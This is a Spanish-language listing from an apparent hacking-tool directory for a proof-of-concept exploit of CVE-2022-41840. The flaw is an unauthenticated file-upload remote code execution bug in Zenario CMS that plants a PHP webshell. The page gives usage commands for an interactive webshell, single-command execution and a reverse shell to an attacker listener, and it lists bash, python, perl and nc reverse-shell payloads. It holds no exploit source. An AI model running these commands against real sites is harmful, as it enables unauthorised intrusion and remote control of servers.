Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/princeaikinsbaidoo/cve-2022-41840-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónDesarrollo de Payloads
GitHubprinceaikinsbaidoo/cve-2022-41840-poc

CVE-2022-41840-PoC

Este es el exploit PoC para CVE-2022-41840, ejecutándose en Zenario.

Ver Repositorio
4hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Zenario CMS 9.3 - Exploit de RCE no autenticado

CVE-2022-41840

Una vulnerabilidad de ejecución remota de código (RCE) no autenticada que afecta a Zenario CMS versión 9.3 y anteriores. El exploit aprovecha una vulnerabilidad de carga de archivos en el endpoint AJAX para subir un webshell PHP y lograr ejecución de código.

Detalles de la vulnerabilidad

  • CVE: CVE-2022-41840
  • Versión afectada: Zenario CMS <= 9.3
  • Tipo de vulnerabilidad: Carga de archivos no autenticada que conduce a RCE
  • Vector de ataque: HTTP POST a /zenario/ajax.php
  • Privilegios requeridos: Ninguno (no autenticado)

Uso

Webshell interactivo

python3 zenario_exploit.py --target http://target.com

Ejecución de un solo comando

python3 zenario_exploit.py --target http://target.com --cmd "id"

Shell inversa

python3 zenario_exploit.py --target http://target.com --lhost 10.x.x.x --lport 4444

Requisitos

  • Python 3.x
  • Librería requests

Instalar dependencias:

pip install requests

Características

  • Carga automática de webshell PHP a través del endpoint AJAX vulnerable
  • Soporte para múltiples valores de instanceId para aumentar la tasa de éxito
  • Extracción de ruta basada en JSON y regex
  • Múltiples opciones de payload para shell inversa (bash, python, perl, nc)
  • Shell PTY completamente interactiva con soporte de terminal
  • Webshell de respaldo si falla la shell inversa

Aviso legal

Solo con fines educativos y de pruebas de seguridad autorizadas.

Esta herramienta se proporciona para investigadores de seguridad y testers de penetración para probar sistemas que poseen o tienen autorización explícita para probar. El acceso no autorizado a sistemas informáticos es ilegal y está estrictamente prohibido.

Los mantenedores no asumen ninguna responsabilidad por el mal uso o daños causados por esta herramienta.

Licencia

Este código se proporciona con fines educativos.

Descargar herramienta